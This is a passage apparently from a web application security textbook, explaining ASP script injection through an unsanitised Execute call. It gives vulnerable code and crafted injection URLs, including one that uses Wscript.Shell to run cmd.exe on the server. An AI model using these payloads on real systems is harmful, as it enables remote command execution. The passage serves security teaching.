N OT E The Perl language also contains an

The functionality described for the PHP application above could be imple-

mented in ASP as follows:

dim storedsearch

storedsearch = Request(“storedsearch”)

Execute(storedsearch)

In this situation, an attacker can submit crafted input which results in injec-

tion of arbitrary ASP commands. In ASP, commands are normally delimited

using newline characters, but multiple commands can be batched when

passed to the 

Execute

function using the colon character. For example,

response.write

can be used to print arbitrary data into the server’s response:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:

response.write%20111111111

The 

Wscript.Shell

object can be used to access the operating system com-

mand shell. For example, the following ASP will perform a directory listing

and store the results in a file within the web root:

Dim oScript

Set oScript = Server.CreateObject(“WSCRIPT.SHELL”)

Call oScript.Run (“cmd.exe /c dir > c:\inetpub\wwwroot\dir.txt”,0,True)

This code can be passed to the vulnerable call to 

Execute

by batching all of

the commands as follows:

https://wahh-app.com/search.asp?storedsearch=mysearch%3dwahh:+

Dim +oScript:+Set+oScript+=+Server.CreateObject(“WSCRIPT.SHELL”):+

Call+oScript.Run+(“cmd.exe+/c+dir+>+c:\inetpub\wwwroot\dir.txt”,0,True)

Download 5,76 Mb.

Do'stlaringiz bilan baham: